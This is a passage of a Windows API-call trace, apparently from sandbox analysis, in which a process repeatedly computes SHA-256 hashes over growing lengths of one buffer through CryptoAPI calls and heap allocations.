	[0118.990] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd0c8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd0c8, pdwDataLen=0x12942c) returned 1
	[0118.990] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.990] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.990] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.991] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.991] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0118.991] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.991] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd0f0
	[0118.991] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd0f0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd0f0, pdwDataLen=0x12942c) returned 1
	[0118.991] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.991] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.991] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.991] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.991] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0118.991] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.991] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd118
	[0118.991] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd118, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd118, pdwDataLen=0x12942c) returned 1
	[0118.991] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.991] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.991] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.992] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.992] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0118.992] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd140
	[0118.992] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd140, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd140, pdwDataLen=0x12942c) returned 1
	[0118.992] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.992] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.992] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.992] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.992] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0118.992] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd168
	[0118.992] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd168, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd168, pdwDataLen=0x12942c) returned 1
	[0118.992] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.992] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.992] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.993] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.993] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0118.993] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd190
	[0118.993] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd190, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd190, pdwDataLen=0x12942c) returned 1
	[0118.993] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.993] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.993] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.993] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.993] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0118.993] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd1b8
	[0118.993] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd1b8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd1b8, pdwDataLen=0x12942c) returned 1
	[0118.993] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.993] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.993] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.994] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.994] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0118.994] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd1e0
	[0118.994] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd1e0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd1e0, pdwDataLen=0x12942c) returned 1
	[0118.994] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.994] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.994] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.994] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.994] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0118.994] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd208
	[0118.994] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd208, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd208, pdwDataLen=0x12942c) returned 1
	[0118.994] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.994] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.994] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.995] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.995] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0118.995] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd230
	[0118.995] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd230, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd230, pdwDataLen=0x12942c) returned 1
	[0118.995] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.995] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.995] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.995] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.995] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0118.995] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd258
	[0118.995] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd258, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd258, pdwDataLen=0x12942c) returned 1
	[0118.995] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.995] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.995] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.996] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.996] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0118.996] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd280
	[0118.996] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd280, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd280, pdwDataLen=0x12942c) returned 1
	[0118.996] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.996] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.996] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.996] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.996] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0118.996] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd2a8
	[0118.996] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd2a8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd2a8, pdwDataLen=0x12942c) returned 1
	[0118.996] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.996] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.996] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.997] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.997] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0118.997] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd2d0
	[0118.997] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd2d0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd2d0, pdwDataLen=0x12942c) returned 1
	[0118.997] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.997] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.997] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.999] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.999] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0118.999] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.999] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd2f8
	[0118.999] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd2f8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd2f8, pdwDataLen=0x12942c) returned 1
	[0118.999] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.999] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.999] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.000] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.000] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0119.000] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd320
	[0119.000] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd320, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd320, pdwDataLen=0x12942c) returned 1
	[0119.000] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.000] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.000] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.000] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.000] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0119.000] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd348
	[0119.000] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd348, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd348, pdwDataLen=0x12942c) returned 1
	[0119.000] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.000] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.000] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.001] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.001] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0119.001] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.001] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd370
	[0119.001] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd370, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd370, pdwDataLen=0x12942c) returned 1
	[0119.001] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.001] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.001] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.001] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.001] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0119.001] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.001] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd398
	[0119.001] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd398, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd398, pdwDataLen=0x12942c) returned 1
	[0119.001] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.001] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.001] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.002] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.002] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0119.002] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd3c0
	[0119.002] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd3c0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd3c0, pdwDataLen=0x12942c) returned 1
	[0119.002] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.002] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.002] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.002] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.002] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0119.002] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd3e8
	[0119.002] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd3e8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd3e8, pdwDataLen=0x12942c) returned 1
	[0119.002] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.002] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.002] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.003] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.003] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0119.003] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd410
	[0119.003] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd410, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd410, pdwDataLen=0x12942c) returned 1
	[0119.003] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.003] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.003] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.003] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.003] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0119.003] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd438
	[0119.003] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd438, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd438, pdwDataLen=0x12942c) returned 1
	[0119.003] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.003] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.003] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.004] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.004] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0119.004] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd460
	[0119.004] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd460, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd460, pdwDataLen=0x12942c) returned 1
	[0119.004] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.004] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.004] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.004] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.004] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0119.004] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd488
	[0119.004] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd488, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd488, pdwDataLen=0x12942c) returned 1
	[0119.004] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.004] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.004] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.005] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.005] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0119.005] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd4b0
	[0119.005] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd4b0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd4b0, pdwDataLen=0x12942c) returned 1
	[0119.005] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.005] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.005] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.005] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.005] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x7e0, dwFlags=0x0) returned 1
